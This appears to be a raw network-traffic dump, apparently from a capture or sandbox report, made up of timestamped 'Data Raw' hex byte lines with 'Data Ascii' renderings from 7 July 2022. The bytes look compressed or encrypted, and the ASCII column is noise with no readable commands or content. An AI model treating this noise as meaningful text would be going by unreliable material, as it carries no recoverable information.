                                                                                                                                                            2022-07-07 07:51:12 UTC942INData Raw: 53 42 13 89 67 92 78 ed 46 ce 41 f7 dc ef 53 66 fc 35 43 c5 4f f0 47 21 b5 e2 f9 e0 72 44 e8 c5 3d df 75 72 7b 88 e0 38 c9 e8 96 4d 55 f1 b5 48 b6 7d f9 f5 64 30 ed 2a 2c 88 80 65 a4 98 5b ec c8 db 79 16 26 1d 36 ca 53 08 3a 98 37 01 f0 93 da 35 94 3a c2 7b 10 a6 8b 96 6b 60 b9 02 37 9d 2c 8f 22 cd 3c b8 a2 5c 38 05 20 1d aa ad 2a 10 d6 db 13 77 6d 58 12 d8 31 01 14 41 d8 a9 d8 28 a6 87 2d dd 31 20 5b 7b 9f 86 34 68 6a 06 6d 12 ff df 4c 9a 7e 94 df 49 3e 91 2f f9 68 10 cc 82 f0 ae e0 67 8b 52 56 87 aa c4 2e 46 7d e3 eb 40 d2 1a 89 e0 0f 1e fe 3c 73 09 60 ec e1 0a 5c 7b a6 b5 47 4f a7 e4 e7 4f 80 4a 19 4e 19 2a 38 bc 70 e2 71 3f 35 0c 93 d9 34 3f 9b 84 d6 ea 82 2d 7c 26 8f aa bd 51 2e ad fe 8e 8d dc 11 01 05 c4 7d c5 69 51 0e 0b f2 57 26 17 83 a0 77 3a 9d
                                                                                                                                                            Data Ascii: SBgxFASf5COG!rD=ur{8MUH}d0*,e[y&6S:75:{k`7,"<\8 *wmX1A(-1 [{4hjmL~I>/hgRV.F}@<s`\{GOOJN*8pq?54?-|&Q.}iQW&w:
                                                                                                                                                            2022-07-07 07:51:12 UTC943INData Raw: e7 76 cd 2d 16 79 83 06 0e 03 7c 86 de b8 60 60 96 93 a4 95 7d dc 5e 6e be 8b ee bb 1c 2b 09 a5 21 3c 46 0d d2 45 fc e1 15 1f 97 cf 6b 61 9c 5f d8 14 f0 8a 56 16 46 24 97 e5 36 89 10 30 db 8a 9e fd c6 b2 f6 c1 0b 46 95 05 bc 67 af 51 e8 32 5b 86 ec 68 91 ce ed 5f 02 a4 66 5b bd b3 9f 0d 23 c0 cc 5b 0b c9 04 a8 1c 55 76 8c 8a 5f 8e 19 a1 a0 94 7f 9f f6 01 07 a1 74 f5 11 fe 4e 9b f9 6c 4a d9 02 94 3f a1 48 65 bf aa ab ae d6 71 c1 98 f5 91 b0 18 60 ce 22 40 36 4f 68 a2 37 2a f3 fd 79 f7 9c 29 ac b1 f0 70 d9 de 47 db fe 03 1f 1a 56 76 d4 07 38 80 49 dc 13 b1 fe 35 c9 5d da 8a a4 4e 83 73 25 33 82 56 d6 77 89 79 c0 cb 67 66 d2 37 dd ea 36 4f de ec e0 36 38 87 8d d1 5a aa ce 8a be ea fe ee 31 e4 bd 6b f7 4f 39 69 74 35 60 c5 d9 44 f5 ec c2 82 07 ac 41 63 ff 47
                                                                                                                                                            Data Ascii: v-y|``}^n+!<FEka_VF$60FgQ2[h_f[#[Uv_tNlJ?Heq`"@6Oh7*y)pGVv8I5]Ns%3Vwygf76O68Z1kO9it5`DAcG
                                                                                                                                                            2022-07-07 07:51:12 UTC944INData Raw: 44 1e 97 7d 86 71 cc ec a7 1d a9 6e c2 d8 ad 79 b1 e3 68 37 2f 70 35 d4 32 e5 d7 36 42 f7 dd 6e 04 1c 35 e9 a3 10 9e 3a 7b ec b6 14 4c 4a 41 87 35 c4 06 b7 62 74 9d 00 f6 df f8 7f d6 e7 34 b0 62 f4 c6 18 74 16 17 90 fc bc c8 3d 67 00 3b 4d 11 97 8e e3 aa bf ee d9 1c 89 e8 77 59 59 c8 d7 ce a7 a1 ad 49 8a ed b0 93 61 6c b7 4c 80 99 f7 c0 4b 43 c8 f7 d1 3b fd 31 2d 49 45 b4 69 76 d1 9b 52 0c 4a ea b6 5c 3e 78 58 4c bc 14 e6 bb 1c f0 11 7c 2c 28 ce a6 65 4f a0 f3 ed 25 bb d4 c5 e1 7e 2d 09 70 61 57 b7 b4 6a d7 76 ac c0 45 ab e4 d0 47 2f ac c6 e7 2f 3d 99 50 d0 ad ac bc 0a b2 5d ee 21 f4 3a 55 16 77 80 e9 15 7d 54 05 45 d6 af 0a b4 7b b6 30 bc e6 35 ec a4 d6 c2 ff 74 c6 85 50 8e 9a fb 77 db f4 30 88 87 d6 c7 b8 8b 31 7e c4 b6 73 33 8e 1f e7 04 1a 1a 79 30 16
                                                                                                                                                            Data Ascii: D}qnyh7/p526Bn5:{LJA5bt4bt=g;MwYYIalLKC;1-IEivRJ\>xXL|,(eO%~-paWjvEG//=P]!:Uw}TE{05tPw01~s3y0
                                                                                                                                                            2022-07-07 07:51:12 UTC946INData Raw: 8c 6e 99 be 71 db e2 fc 72 14 bb 69 08 58 f5 e5 f0 49 45 c1 cf b8 6e e9 d7 8a 02 b2 70 f7 e2 e2 42 d1 ad 30 1e 46 3d 10 35 e7 bf 58 6d 0c 98 56 a6 02 fa ef 10 1c f7 50 f4 ce bf 09 52 33 9c 93 39 ad c2 df e9 cf e0 c9 14 d0 09 35 3f 8c e5 cb 50 a7 68 24 06 68 f4 7d 4f e7 81 16 6d 24 43 f3 0e 74 47 d2 97 4c 8c 05 d1 0c b9 dd ff 56 8f 10 32 42 2d 93 9a 64 59 96 c9 d4 9a 08 b4 07 72 38 c8 af 31 a0 44 5d 4a ec e1 3c 91 e0 48 19 ba 95 5b 1a ca 38 e9 d5 e9 4d 86 f1 03 2e f9 ec f9 b2 30 1c 8e b7 00 42 d3 4e c6 c9 84 7e 1b 0c 20 95 cc 09 c9 d8 4c df c6 72 c8 24 af b3 6a 86 dd 4e 1a d8 e9 1d 35 96 b8 d0 5a ef 87 5d a5 57 0a 00 b8 d6 da 18 8d 18 ab 3a 35 e4 7f bd ae 44 7f 73 33 4b df 6d 52 de e7 95 73 c8 df 2b 6c 22 41 23 c0 a9 cd c8 a1 37 46 a1 c5 1c f4 91 f1 cd 76
                                                                                                                                                            Data Ascii: nqriXIEnpB0F=5XmVPR395?Ph$h}Om$CtGLV2B-dYr81D]J<H[8M.0BN~ Lr$jN5Z]W:5Ds3KmRs+l"A#7Fv
                                                                                                                                                            2022-07-07 07:51:12 UTC947INData Raw: 52 78 8b 09 e2 1a 84 7e 01 45 01 a3 d8 c4 64 9a 24 d5 1a a7 7c 1c 29 1d f8 a9 be b5 82 8c 6c 59 d2 68 5c 1b 4a b6 02 06 c9 9d 41 c5 a3 79 eb c5 b4 ce a4 32 1a 38 5f 25 dc b0 a5 5d c0 8e 6f 6d a2 f3 f0 5e f0 4f 94 3e 77 28 7c b8 35 59 eb 3d 0f 02 41 71 c8 c2 bc df aa 8a fc b9 8a 78 94 98 4d 79 75 aa f5 77 b2 45 5e 10 b8 59 d1 ad 11 45 d2 0e e9 7a 50 24 ce 7f 0d ec c2 20 d2 a9 16 50 5c 96 cb c6 0a 13 c3 50 56 85 1b 2c 11 44 a3 79 d8 7d ee 09 d5 07 56 ff df 15 99 8c c6 1e c6 f5 c4 12 f5 de d0 df 92 fb a5 34 1c d5 bb 89 b6 07 e5 7c 07 0a a2 17 93 f0 8a b1 01 0b 16 20 29 12 66 13 09 92 01 49 df ca fc 73 11 2e f7 1b 97 7f d6 82 7b bd f1 b8 3a cb 42 e2 82 ff c2 72 b6 d9 10 33 c9 0b 77 2c d1 50 72 0d f2 75 be c8 1a 6b e1 83 c2 0a d3 da 6b 59 75 cb 3b 26 cc 80 10
                                                                                                                                                            Data Ascii: Rx~Ed$|)lYh\JAy28_%]om^O>w(|5Y=AqxMyuwE^YEzP$ P\PV,Dy}V4| )fIs.{:Br3w,PrukkYu;&
                                                                                                                                                            2022-07-07 07:51:12 UTC948INData Raw: ce b3 30 09 21 c0 5f 31 87 bf aa 98 67 bc c4 65 82 3d fc 80 4a b7 ed d6 4f 9e 7b d2 5e 42 67 6a 78 99 13 37 c2 8b 33 bf 40 e4 6d 2c 42 59 e9 dd 9b 38 76 4f 14 70 1b e7 51 29 2e fb b4 53 b3 ee e0 72 b6 a7 1e 38 04 09 10 79 fe 7d ec bc 60 fe 3f 60 f1 bb 13 49 61 c7 5a a8 55 a1 ef 67 e2 4e 02 86 48 d4 3d 99 45 cb f7 e1 87 bc e1 08 b3 24 16 7b 2b ad b1 f2 f2 96 bd 99 30 a7 2a 27 86 e7 df 69 b8 94 ec cc 4f 54 5e 37 2f 3e 78 b8 54 43 b7 47 67 cd b0 9e 6b bb f6 e1 91 e9 bc a0 96 71 2e dd 68 21 2e 63 02 32 f4 0b 2c f1 5f 5d 35 36 59 1e 6f fe dd 0d 11 6e 58 43 36 0e da 99 db cd 0a d4 4a 02 64 87 6e f0 17 54 20 30 be d6 80 83 f3 84 c6 95 03 9d 52 f1 cd 25 7d da 7b 10 6e b7 53 24 00 a9 b6 ff d2 41 59 52 1a 1d 6a 72 6c d9 62 a2 36 ea e8 ec d7 35 26 a5 c2 fe 02 31 50
                                                                                                                                                            Data Ascii: 0!_1ge=JO{^Bgjx73@m,BY8vOpQ).Sr8y}`?`IaZUgNH=E${+0*'iOT^7/>xTCGgkq.h!.c2,_]56YonXC6JdnT 0R%}{nS$AYRjrlb65&1P
                                                                                                                                                            2022-07-07 07:51:12 UTC950INData Raw: 28 3c 7f 0e fe c6 35 df c8 df bd ba 70 8b b6 0d 5b ec 47 b2 44 8a 99 43 0e 01 c5 31 d8 7e eb 45 da b0 ce f0 2b f7 ce cf 45 98 93 b5 b4 25 21 5c 3c 07 5f 17 97 5f db 45 dd d1 dc 1d 34 fd 8b 39 78 46 f2 7e 78 0b 1a 40 06 6e 0b 3d 5c 11 c1 f7 fc 04 c6 af f4 1d 40 75 68 c2 ae 30 63 7b 8a 68 d4 d5 ba d2 4f 26 ed e7 54 c0 0a ae 62 77 c5 4c 41 bd 2d 34 28 a6 1b 22 3f 4e e5 bc a5 29 ea 01 86 66 3c a7 67 3a e7 78 24 77 88 b3 4f 57 4c 2e a2 e5 85 a6 7f d6 22 d6 af 61 04 21 1c 71 55 fd a0 9a 5c 21 c7 c3 2f 67 26 40 a8 48 24 6f a5 5b 07 72 ed 79 8a 0c ea f5 2b f2 8e 62 fc b0 8d f0 b5 16 a5 83 a2 be 82 66 cf 7c 91 8b 94 1d 33 93 a6 bc 11 aa 55 54 59 a6 20 5c 8f 19 1d f0 3a 4c 13 ef eb 16 1f 0f 24 19 98 01 02 a7 a7 5a f6 2f e5 f4 dc 94 0d e3 1d bb 42 fc 3f 22 9c a2 55
                                                                                                                                                            Data Ascii: (<5p[GDC1~E+E%!\<__E49xF~x@n=\@uh0c{hO&TbwLA-4("?N)f<g:x$wOWL."a!qU\!/g&@H$o[ry+bf|3UTY \:L$Z/B?"U
                                                                                                                                                            2022-07-07 07:51:12 UTC951INData Raw: 20 9f 70 93 05 ad 23 69 ac 37 a2 95 ac ea 48 fb e5 d6 41 64 46 fe 3f 38 c4 f1 b9 95 40 85 9f f2 ec 52 e2 5f 68 fa bd 15 dc 04 ef 3c 1d 88 22 22 fe e3 ac 9a 14 3c 8d d0 dd b3 80 71 d2 3a b2 13 d2 36 c1 a4 47 aa f3 16 fe 4d 68 42 19 7a 6e 31 b6 13 84 cf 92 1b 71 38 c3 d3 c1 0a f3 ca 92 bf 99 0d 4e d4 5d 28 62 e3 47 16 9f ea 03 bb e6 14 fd d1 a4 73 21 23 ec 40 96 77 d1 a8 5d 59 0c 69 fc b0 09 46 6a 64 4d 21 0d 3c 90 e7 84 4a 30 f2 2b ac cc 8e 7a 9e bc a4 f0 0c 86 52 9f 06 63 d3 54 f5 f0 5d 7f 85 50 f5 25 e2 1c 79 c8 98 7a 66 69 eb e5 34 14 af 73 38 63 95 68 f2 7b 76 69 86 af 39 cd f5 ac d1 ff 76 ed 4b d7 6e 2b ba 49 89 1b 7b 7b 70 53 b1 2a 7c ae 80 60 d9 91 ad a1 c6 87 85 f1 5a 05 4b 3f e8 4f e4 3b 90 5a cc b3 a5 23 42 c4 25 6a e9 ed 17 67 53 ad 44 29 02 1e
                                                                                                                                                            Data Ascii: p#i7HAdF?8@R_h<""<q:6GMhBzn1q8N](bGs!#@w]YiFjdM!<J0+zRcT]P%yzfi4s8ch{vi9vKn+I{{pS*|`ZK?O;Z#B%jgSD)
                                                                                                                                                            2022-07-07 07:51:12 UTC952INData Raw: e7 00 1d e5 8a b0 6d a6 34 3b f5 35 f0 a3 56 2e aa 70 3e 2f f5 f7 75 6b 90 a6 28 29 4a 88 d0 6a 11 b1 16 72 e0 60 91 8a 8e 73 89 50 02 d4 0f 64 dd e7 f9 35 8e 92 f1 06 7b 22 6e 01 1d 2c ba 17 7e 87 ec 11 38 e3 59 dd f0 57 e4 4e e9 57 3e 62 30 6c 04 b5 ac d1 6a 0e d1 e6 c2 fd 85 27 f2 d7 0e 7c 5e af 62 75 be 48 e0 49 dc b2 3b f8 a6 dc 4b b4 9e 2b bb a7 51 ce cb e9 14 43 23 84 a7 5f a0 53 67 38 67 9f 89 bd 97 e2 7e fe 97 8d 15 77 dd de 31 ce e1 b0 fb 5c 59 38 0f aa fb 7a f0 5f 6f a6 37 41 c3 07 4f 99 d8 f0 3c 40 1e 3f 71 59 0d c9 e5 1b 35 a1 76 89 12 e3 6a 7c 8a c6 a2 8a 5f b3 25 8b f2 88 eb 6c 02 e6 b7 5c 86 d1 4e f3 e0 84 15 29 f0 6b fc 47 4d d6 c4 47 ac 8c fe d5 7c 2d 3f 65 a7 17 54 4f a0 20 29 3d 78 49 89 bb ab 95 ec b0 ed a3 7f f3 7d 0b f7 79 89 68 ba
                                                                                                                                                            Data Ascii: m4;5V.p>/uk()Jjr`sPd5{"n,~8YWNW>b0lj'|^buHI;K+QC#_Sg8g~w1\Y8z_o7AO<@?qY5vj|_%l\N)kGMG|-?eTO )=xI}yh
                                                                                                                                                            2022-07-07 07:51:12 UTC954INData Raw: c4 53 7a 1a da 05 3c a2 45 fd e0 90 54 48 f1 fc 0a d3 e6 78 cb 23 65 9f 5c 15 88 c5 0b 01 60 37 6b d6 f4 6c 26 11 03 88 44 87 32 e8 4f 23 28 03 e9 d3 f6 c5 dc 0a 47 a0 6b eb b0 38 da 58 ef 01 19 56 96 ce 38 cd 5a 5a f8 91 98 d5 2b fa db b3 68 8e c0 1d 1a 59 29 b4 00 e3 c8 95 a9 17 f3 94 f3 e7 c2 2d 98 5d 98 e7 54 c6 40 ad c4 1f 5a df 86 fd f3 cc cb db 74 29 20 cb 6c b3 94 1e 39 1b 4c cf d1 de 31 9d 3d 59 08 dd 88 0e 00 c3 8e ca a0 b1 33 4b 99 0d be 94 30 4f 66 64 ae 4c 3a d3 c4 21 f3 1d c6 73 2c 6e 4d 65 07 a7 26 38 3b 04 79 49 9b 7d c4 f9 05 b3 a3 51 79 43 aa e3 0c 3f 8f 58 fb 67 0a 99 be db 5d 69 59 d0 73 f2 56 3c 38 59 14 3e e1 3d e8 a6 a8 22 88 65 85 65 b0 c6 04 28 ea 30 85 bf 28 11 0b d9 74 68 83 63 42 40 0f a9 0a e7 6a ae af 61 ab 9f cc 56 e2 59 88
                                                                                                                                                            Data Ascii: Sz<ETHx#e\`7kl&D2O#(Gk8XV8ZZ+hY)-]T@Zt) l9L1=Y3K0OfdL:!s,nMe&8;yI}QyC?Xg]iYsV<8Y>="ee(0(thcB@jaVY
                                                                                                                                                            2022-07-07 07:51:12 UTC955INData Raw: 45 9b 38 2b 84 48 5e a7 59 73 28 14 b1 6b 7b a6 b5 bb 4e 26 6f a3 32 90 a1 00 cc 49 97 b0 42 75 22 1b 51 95 6e 46 28 a3 6d 53 01 ab 89 b0 8d 21 20 41 c3 e1 f8 73 b1 54 c9 1c f2 0f 50 83 5b c6 e0 c7 4b b9 88 0c fc a9 b2 24 72 2f 23 48 51 bf cc f9 7b 7c ab a0 d2 39 fd 30 67 15 d6 1d 2a 2b 63 38 c9 49 c5 54 b3 46 1b 33 79 9c 5d dc 08 6b 42 18 91 29 d1 19 65 c2 77 4f e3 0d 2c 93 80 91 18 34 7c e3 d7 25 45 6f e7 10 1d 03 13 3d fe 9c 67 19 8d c5 49 fb d5 9e db 89 f0 f5 bf 9c 93 9a d0 7e 25 1c d9 c5 47 45 ad 5f 91 d2 f2 a8 56 2c 1f a2 6e 48 bb c7 9b 20 b9 94 c4 45 e4 99 76 8a 74 89 61 d3 8e 21 ed a3 1e 17 d0 f1 c6 05 80 66 31 f7 32 e4 2c 20 7d 6b c0 ec 9a b1 7e 7d 10 f1 4d fe ca a9 e1 2b 08 47 d4 ce 36 89 f8 67 6b 94 9a b6 58 f6 af b8 6d 04 f5 c9 0a 40 0f 61 7d
                                                                                                                                                            Data Ascii: E8+H^Ys(k{N&o2IBu"QnF(mS! AsTP[K$r/#HQ{|90g*+c8ITF3y]kB)ewO,4|%Eo=gI~%GE_V,nH Evta!f12, }k~}M+G6gkXm@a}
                                                                                                                                                            2022-07-07 07:51:12 UTC956INData Raw: de 26 9f ef d6 92 b5 7b f6 98 60 f8 60 80 6d e5 87 1b cf 63 3a 64 ec 82 ed 92 63 64 a2 f9 30 87 70 7b 74 91 e0 a5 40 02 76 27 13 2e c5 4b ac 95 16 43 fc 3d 8e 44 52 3f b5 b2 3a e6 b1 01 00 fa 08 ce 85 29 5d 12 e4 5c 82 47 0d 32 3e 9a c6 2d 02 4c ae 36 f3 8b f9 40 3c 1b f8 1d dc a9 eb 37 ee d8 16 61 8a 91 3e fa fc c7 72 c5 e3 0f 5c 8b 9b ba 62 0d ac 7a 95 68 87 f9 52 78 f6 0c ca 3c 10 bf 97 f3 ca cc 25 7c d1 e1 eb 33 89 38 40 77 7f 21 b0 d7 03 40 bc 44 aa 88 85 45 4a 1a 8e f5 0b 70 fa a3 9c 78 98 46 f6 37 ec a4 14 56 3c 59 ec f1 28 f1 3e 54 5b ca 96 5a 46 c1 45 21 b4 d9 76 88 52 cd e9 7e 38 8e 13 41 51 30 64 0b 32 70 e0 b3 b0 ed e7 f0 61 42 bc 96 c1 3a 1e ef 1c 5b 0c 78 91 b9 1a 7a 27 6e be a0 33 55 94 5f 57 90 28 d5 6c 5f 7b c3 d9 a1 f8 44 e6 03 fc a1 c8
                                                                                                                                                            Data Ascii: &{``mc:dcd0p{t@v'.KC=DR?:)]\G2>-L6@<7a>r\bzhRx<%|38@w!@DEJpxF7V<Y(>T[ZFE!vR~8AQ0d2paB:[xz'n3U_W(l_{D
                                                                                                                                                            2022-07-07 07:51:12 UTC958INData Raw: 6c e2 0f 00 0a 1c ea aa c9 e0 aa b3 9a 4e e3 c0 e8 ea 70 98 76 06 e9 99 26 e0 7e 7a b3 d7 e0 c3 f6 99 a7 f4 98 45 6a 44 b2 7f 59 52 a7 df 66 a0 ca 69 27 1c c2 74 0e aa 23 7b c0 b8 ff 19 58 ee b5 8a c5 c3 60 64 b6 c3 12 11 aa c9 9f 33 3c d9 cb a5 4f a1 3a 3b d2 54 cf 03 0a 80 d9 b9 28 94 d6 97 01 fe 08 18 b5 5e 5d 4f 00 25 54 af 31 10 07 16 cf e0 3e a4 13 96 54 4b 84 04 5e 81 32 25 7c 28 d3 ec 8d f2 0a 48 f7 4f 11 56 73 1e 9b c1 46 8f f0 71 91 e6 df 8c 28 51 7a 6d e8 49 d9 96 de bd 34 a2 60 8f f4 7b ab 58 02 24 26 32 78 68 30 d1 95 b5 88 7d 12 c0 e2 23 bf 77 ec 61 d6 03 0e e2 bc fc 9b c7 12 bb e3 c8 b6 1c 7c 96 33 8c df 4b 00 cc 81 21 b9 02 40 cf 22 6f 0c f6 48 5f 43 03 78 39 b0 12 5e f2 37 b1 f2 b0 ef 49 da 65 0c c2 74 42 6e 79 36 7a dc 29 90 f2 76 94 34
                                                                                                                                                            Data Ascii: lNpv&~zEjDYRfi't#{X`d3<O:;T(^]O%T1>TK^2%|(HOVsFq(QzmI4`{X$&2xh0}#wa|3K!@"oH_Cx9^7IetBny6z)v4
                                                                                                                                                            2022-07-07 07:51:12 UTC959INData Raw: ac e9 3d d5 f6 0b 85 79 62 0b 6a fc dd d5 28 49 41 ab cd 76 19 8c b7 c4 9c ed 55 54 fe e9 20 c2 e0 00 4d 30 1a bb 80 a4 0f 62 cd 10 6e dd bb 31 55 9d 86 4a a3 f5 c0 9b 74 27 b8 02 5c 5f 0e f0 2b 88 c2 4a 08 10 71 e0 e3 31 8a fc 02 42 7f 79 c5 15 eb 8b 76 86 6c 5d bc b8 7a 8c 2b 55 ba 06 7d 3a 83 77 ca ef 25 0c 2d cc 6a 88 42 3d 3b 03 bb 2b d7 ac 58 fa 63 dc fb 49 4d 2a 7e b1 29 b6 5f 82 46 02 2b 1e 61 6b ae 81 fc a3 fe b2 0d ec c4 3e cd e1 1e 5b 8a 2d 69 da 74 f5 c9 7c 87 97 fe f2 6d b8 0d 30 c5 1f 12 6e 1a e6 0a 45 78 74 11 c9 34 c9 dc 0b d6 69 68 2f 0a c6 40 0e 39 3e e8 72 17 28 32 e1 05 34 24 59 5c b5 5d a3 95 53 a6 36 de 85 dd 20 52 f6 ee 26 c9 5d be 79 c5 ea 57 e1 a4 97 54 fa 17 c6 21 8b 05 26 1c 29 0a 91 4b 40 ab 8a 00 62 c2 ac 03 a0 e5 8d ef 36 52
                                                                                                                                                            Data Ascii: =ybj(IAvUT M0bn1UJt'\_+Jq1Byvl]z+U}:w%-jB=;+XcIM*~)_F+ak>[-it|m0nExt4ih/@9>r(24$Y\]S6 R&]yWT!&)K@b6R
                                                                                                                                                            2022-07-07 07:51:12 UTC960INData Raw: cb 0a 9c 7b cf 3a 87 c6 08 31 f0 d1 76 a9 de 73 a2 b3 54 8f 29 84 4f 04 ea 85 f5 f3 67 59 a6 42 87 ed 52 e7 42 0f 15 4d ab 5c a0 87 f6 ca 20 6b e2 c4 8e 4c 64 ae 77 42 a5 5a ae 36 2a 4b e4 95 29 9c ac ad ee a9 d0 af 78 77 3d fd c0 ca 79 97 ca 76 fd 82 d3 87 25 56 9a 4e 99 6e 04 c7 a7 85 a5 17 9d 44 1e 15 68 bf fe 03 8d 38 7e 4d d8 bb 50 ff 14 57 e9 9a 23 39 38 87 33 66 35 75 8f ae 18 0e 38 ef 03 cc 2a c9 a1 7d 26 0c 63 6c 17 65 f2 3b e1 8e 35 14 e6 e3 81 68 1e 5a fb 49 70 ca ae 1f 0d 39 66 6a f0 ea 6e 78 65 4c 78 f1 26 d6 c1 f7 06 9d ef e5 f3 27 84 a4 e6 25 2a 03 79 e6 48 20 46 93 72 ea 35 47 4b cd b2 a7 c6 c4 1c 69 93 da 3e 99 d3 6d 89 3b 95 02 87 e3 1d 1f 4f 0c 4e 1d b4 66 57 64 21 91 2f 2e 46 a1 1f 20 1d 8d 98 37 b4 73 33 f5 3e 8d d9 bf 5d f9 8a 26 b8
                                                                                                                                                            Data Ascii: {:1vsT)OgYBRBM\ kLdwBZ6*K)xw=yv%VNnDh8~MPW#983f5u8*}&cle;5hZIp9fjnxeLx&'%*yH Fr5GKi>m;ONfWd!/.F 7s3>]&
                                                                                                                                                            2022-07-07 07:51:12 UTC962INData Raw: d5 75 8a 60 0b 71 d1 b9 2a 28 bd 5c 78 23 3b e2 76 93 ff 9e b7 f1 52 68 0b e7 81 00 8d 30 a6 48 b8 7c 46 56 df 78 cc c3 32 e5 e5 b5 a5 2b 5b 5b b0 27 a2 eb 02 2b 61 3c b6 94 d1 20 95 35 d0 8c 71 5c 73 14 d5 53 d6 1d 68 67 7b c2 e3 06 f2 94 65 19 ff b0 83 90 78 28 03 bc 52 06 cf f6 49 e2 4d bf be 72 37 46 ea 02 49 b6 8d 79 60 2d d6 f4 43 98 db 6c e7 95 ef 48 98 a1 0e 03 2e ea 22 02 82 79 80 b7 d2 bd 72 0f 05 05 76 70 c3 87 88 a5 49 92 7c bd 8d ff d9 cb 8d ba 89 ab c5 b9 dc 75 f8 b0 0f 7f 0c a7 27 07 8e fc 6a b2 52 97 69 77 70 dd 62 43 87 25 4b b1 80 09 f2 04 25 b4 98 bc d8 35 a9 74 bb c7 81 99 19 6d cc 84 cd 0c 2b 77 71 39 33 92 7a 38 5c 22 3c aa 78 4f df 03 2a 4b 2f 87 f1 17 c0 a8 ed 7f 3f 40 84 0a 94 9a 62 d0 05 7f 73 f8 00 e6 30 cb b2 fc a1 6e 84 6b 0b
                                                                                                                                                            Data Ascii: u`q*(\x#;vRh0H|FVx2+[['+a< 5q\sShg{ex(RIMr7FIy`-ClH."yrvpI|u'jRiwpbC%K%5tm+wq93z8\"<xO*K/?@bs0nk
                                                                                                                                                            2022-07-07 07:51:12 UTC963INData Raw: d1 42 a2 42 43 5d 39 5d 4d e2 e5 66 76 c4 c9 82 9a 2a aa cd f8 8a d9 fe df 06 a7 8c a8 0f 51 3c ce b4 81 73 5b 8d 4b d4 64 ea db 39 e1 60 42 7a 4e 82 e3 81 48 ec d5 57 32 47 eb 05 b6 79 cc 4e 14 8f c3 b0 c9 d3 eb 5e 9c 0a b5 42 52 27 20 aa dd db f6 dd 10 7d e2 94 d5 20 ca 22 82 b8 2a 17 1b 02 fa 20 ca e0 9d 6c 6f da d6 3a 92 af cf 8e f5 c3 94 b7 55 c2 86 5a 39 6a 32 54 0e b5 0e 64 2b 17 9c fe 82 d6 ab 73 11 a1 bd 9e b8 39 c9 86 1c 76 79 1b df f8 17 71 8e 70 c0 d0 b2 4a 95 91 4b e4 18 3e f0 f6 b6 04 b8 0e 7e a7 5f 59 d4 f4 1c cc eb b8 dd 16 d8 7e f8 90 58 19 a5 1e 66 37 96 65 11 e3 20 b4 e0 0e 4b 52 30 d9 bc 6b 5c b7 7b f6 a8 6b 98 86 95 c0 63 29 39 b8 52 39 ad a2 f1 e1 af 76 46 2c 6c 2c 9f 37 8c 5d 64 ad 50 e1 80 c5 30 9f 31 41 6f 8c 06 36 e8 8c d3 92 f1
                                                                                                                                                            Data Ascii: BBC]9]Mfv*Q<s[Kd9`BzNHW2GyN^BR' } "* lo:UZ9j2Td+s9vyqpJK>~_Y~Xf7e KR0k\{kc)9R9vF,l,7]dP01Ao6
                                                                                                                                                            2022-07-07 07:51:12 UTC964INData Raw: 5d cd df a1 97 b1 da 04 86 9b 39 11 ed b7 8a 75 59 4d 93 de 6d 31 1f f2 86 f9 f3 ab 0e 59 e1 f1 15 ac e2 8b 60 05 07 f3 b7 93 d6 90 67 95 6b 8f b9 8e 72 2e 90 7d f2 ed d9 1b 9c 68 44 43 79 15 26 e6 e3 81 84 ba a3 ee 8d 69 1a 2e b1 8a 62 ae c1 86 cd 85 3e e7 44 b2 33 52 d2 97 63 ff 29 34 c9 d6 93 97 59 98 23 33 cd 9e 3a d6 e8 91 b4 5a 21 b1 b4 4b 22 d0 37 9b 25 00 45 32 4a 90 10 ec 2c c3 86 7b f8 c7 e1 a1 1f 1e 1e 51 bf 60 9b f3 d9 07 bd 72 16 8d 28 49 e0 3c 40 6a 77 5c 84 e1 bb 3c c4 a1 a6 fd 50 79 b4 82 e6 3d c3 eb 62 a3 52 22 79 a9 80 ed ad a7 59 4d 22 71 60 63 80 e4 b2 c4 9d c5 b1 11 70 75 23 46 cc 1b a1 89 6e e1 aa dc 64 1d 98 2d d6 4d 9c 28 a4 53 51 7c 14 b8 8c 6d e0 9c 23 73 d6 b2 ae a2 63 14 99 46 8c dd 7a f4 e7 be 95 86 3b aa b5 53 8a 2e 82 0f 1b
                                                                                                                                                            Data Ascii: ]9uYMm1Y`gkr.}hDCy&i.b>D3Rc)4Y#3:Z!K"7%E2J,{Q`r(I<@jw\<Py=bR"yYM"q`cpu#Fnd-M(SQ|m#scFz;S.
                                                                                                                                                            2022-07-07 07:51:12 UTC966INData Raw: 16 de 86 9e 71 90 15 ce d6 7f 40 13 70 50 ac a0 28 6c 24 d1 0e 79 22 a7 d4 e6 08 bf 04 ed f8 df a4 a2 81 cb 2f 56 fa da c5 30 bf a4 8c 46 ec cb 01 fe b9 4e 79 ce d6 a1 47 bd f8 13 a8 4b ee ac f4 9c 80 6c ce 77 b3 0f 6d be 10 b8 cb 77 f2 00 1b a1 fd c8 36 33 36 01 74 51 2a 68 56 a1 f4 2e de ce a5 dc b8 aa bf 43 1e fa 96 a9 93 8d c3 61 ae 7d cb 26 d8 35 1c 18 2e 31 9f 24 84 9e 69 fd e8 17 9b 8a 48 95 d0 bd af 40 4a 81 44 5e 7b f0 dd ad d9 a0 85 5c 1b 81 47 e7 55 d7 d8 ad 7b e9 f0 f8 34 a7 f3 1e 69 82 ec 20 96 f8 5d 90 86 bb d6 d5 8b 63 aa c8 80 1e 85 13 dc bb 88 e4 ba ba c6 3a 82 03 31 56 ab 98 de 22 dc 25 4a a0 cf f4 8f 61 4d 10 ca d4 a7 c2 bb ad 3c 5e d6 a2 04 18 36 a0 b7 89 1a af 13 32 80 fb fa 0c d5 f7 f6 49 20 84 7b bb 20 7e cc 72 a9 b8 df a1 5f d4 5a
                                                                                                                                                            Data Ascii: q@pP(l$y"/V0FNyGKlwmw636tQ*hV.Ca}&5.1$iH@JD^{\GU{4i ]c:1V"%JaM<^62I { ~r_Z
